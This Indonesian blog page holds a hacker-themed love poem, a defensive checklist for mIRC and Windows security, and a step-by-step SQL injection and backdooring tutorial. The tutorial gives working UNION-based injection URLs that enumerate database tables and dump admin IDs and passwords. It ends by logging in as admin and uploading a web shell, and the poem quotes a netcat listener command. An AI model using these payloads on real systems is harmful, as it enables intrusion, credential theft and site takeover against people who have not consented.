1.2.11

"Surat Cinta Seorang Hacker"

surat ini saya ambil dari catatan fb temanku... entah kenapa begitu aku membacanya saya ingin mempostingnya di blogku...

saya begitu terkesan dgn apa yg dia tulis dalam suratnya itu....

"Selamat membaca"

Halo apa kabar....

Terima kasih telah membalas suratku.......

Aku tau setiap bug vulnerabilitasmu telah di patch
Memang salahku terbujuk rayuan honeypot yang kau pasang sebagai jebakan maut hingga membuatku kehilangan arah......

Harusnya aku sadar.....
Semua protokol default tak pernah kau pakai 80, 21, 3128 atau apalah...
Sehingga C:\nc -l -o -v –e yang kuberikan, mungkin.....kau anggap sebagai spam.
Tapi.....Walau aku memakai anonymous proxy untuk HTTP
Aku tak pernah menyettingnya pada protokol lain
Karena dalam hatiku ini menginginkan “trace mode” mu berkerja untuk menemukan IP asliku.....
Karena itulah cinta, malu tapi tetap berharap..benar bukan...?


Mungkin kau tak memerlukan firewall untuk menjagamu dari program-program jahat
Mungkin trojanku tak mampu membukakan pintu untuku
Dan mungkin pula sistem administratormu telah mengambil alih semua sevice yang ada...

Tapi yang kuinginkan hanya satu.....
Aku ingin sebuah cinta..Aku bosan menjadi pecundang.......
Aku bosan hidup dalam persembunyian....dan aku bosan  menjalani kekacauan seperti ini.....

Sakit hati ini saat menemukan Requst Time Out dalam setiap ping ku...
Aku ingin menangis ketika kau 403 "forbidden" untuk aku
Tapi meskipun 404 "not found" selalu kudapatkan dan 503 seringkali menolak aksesku dengan kata kejam "access denied"
Aku tetap akan berusaha mengambil alih hatimu dan menuliskan
“This page has been owned”

Apapun akan kulakukan agar hatimu bisa luluh.....
denial of service, file inclution, flooding bahkan social enginering bila perlu....
jadul memang, tapi itulah cinta.

Aku tau kau seperti spywere, menyusup diam-diam dan tak pernah terdeteksi antivirusku...
Kau......masuk begitu saja kedalam hatiku dan menempati fakepath dengan attribut hidden hingga sulit kumusnahkan.
Kau adalah kekacauan terindah yang pernah kurasakan.....
Bila suatu hari nanti aku mengalami “system in serious error”
Tak apalah, aku rela merasakanya, demi kamu.....seorang bidadariku.

Write by :
Aditya ( 01022011 at 18:45 PM)
 balasan-kedua-surat-cinta-seorang-hacker

Mencegah serangan ketika chat di mIRC

1. Hindari spam dengan tidak mengunakan scrip remote yg tidak anda kenali betul, contohnya ketika anda chatting ada perinah seperti ini: ”WANNA BE OPERATOR #channel ?? copy/paste this“ atau “STOP SPAM copy/paste this” jangan anda copy scrip2 seperti ini jika tidak mengerti betul scripnya, delete remote yang tidak anda kenali

2. Matikan timer anda, jika ada timer yang bekerja dengan ketik /!timers off

3. Jika anda masih memakai firewall windows
  • Control panel
  • Double click windows firewall
  • Exceptions, lihat aplisaki yg dicentang bila anda tidak mengenalinya lepaskan centangnya
  • Masuk ke tab advanced
  • Pilih setting, lepaskan smua centang pada service (apa lg bila ada yg tidak dikenali)Tab ICMP, lepasan juga semua centangnya
4. Matikan Remote Access caranya:
  • Klik kanan pada My Computer
  • Pilih Properties
  • Pilih Tab "Remote, hilangkan tanda centang pada option alow remote assistance dan allow user connect
  • OK

5. Menghapus User Account yg tdk
  • Control Panel
  • Performance and Maintenance
  • Administrative Tools
  • Double Klik Computer Management
  • Pilih "Local Users and Groups
  • Double klik Users
  • Hapuslah account2 yg tdk digunakan ( yg tidak dipakai ada tanda X )

6. Gunakan Firewall untuk mencegah serangan-serangan yg mungkin tidak anda ketahui lewat port2 tertentu, dengan Firewall, anda dapat memblokir beberapa port yg biasa dijadikan jalan masuk! Silahkan cari di google untuk donlot firewallnya (jgn lupa diUPDATE )

Berbagai sumber, sahabat.blogspot, spinx21.blogspot,mr_beat(undernet)

Tutorial SQL Injection + Backdooring



---->>> 1
Kita tetapkan target terlebih dahulu
contoh: [site]/news_Event/newsDetail.php?ID=2

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vuln.
contoh:
[site]/news_Event/newsDetail.php?ID=-2 atau [site]/news_Event/newsDetail.php?ID=2'


---->>> 2
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+

contoh:
[site]//news_Event/newsDetail.php?ID=-2+order+by+1--

sekarang cek secara satu per satu
contoh:
[site]/news_Event/newsDetail.php?ID=-2+order+by+1--
[site]/news_Event/newsDetail.php?ID=-2+order+by+2--
[site]/news_Event/newsDetail.php?ID=-2+order+by+3--
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--

sehingga muncul error atau hilang pesan error...
misal:
[site]/news_Event/newsDetail.php?ID=-2+order+by+5--

berarti yang kita ambil adalah sampai angka 4
menjadi
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--


--->>> 3
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 5
maka:
[site]/news_Event/newsDetail.php?ID=-2+union+select+4--

ok ,yg keluar angka 2
gunakan perintah version() untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,version(),3,4--

lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema


--->>> 4
Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- -> dimasukan setelah angka terakhir

contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--

seumpama yg kita cari adalah "admin"


--->>> 5
Perintah group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.
website yg digunakan untuk konversi :

http://tools.vyc0d.com/converter/

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646d696e

[site]news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x61646d696e--


--->>> 6
Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah group_concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(0x3a,hasil isi column),3,4+from+(nama table berasal)--

contoh kata yang keluar adalah adminID,Name,password

maka
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(adminID,0x3a,Name,0x3a,password),3,4+from+admin--

Nah dah nemu ID dan password-nya sekarang Very Happy

ket: 0x3a sama dengan : <- titik dua --->>> 7
Mencari halaman login Admin
Login sebagai admin
Cari fitur2 upload file atau gambar, lalu upload shell kalian
ENJOY........ :D



Untuk lebih jelasX dunlut video-nya di Klik Here!!

pass : israelserverisdown


------------
thank's to :


vYc0d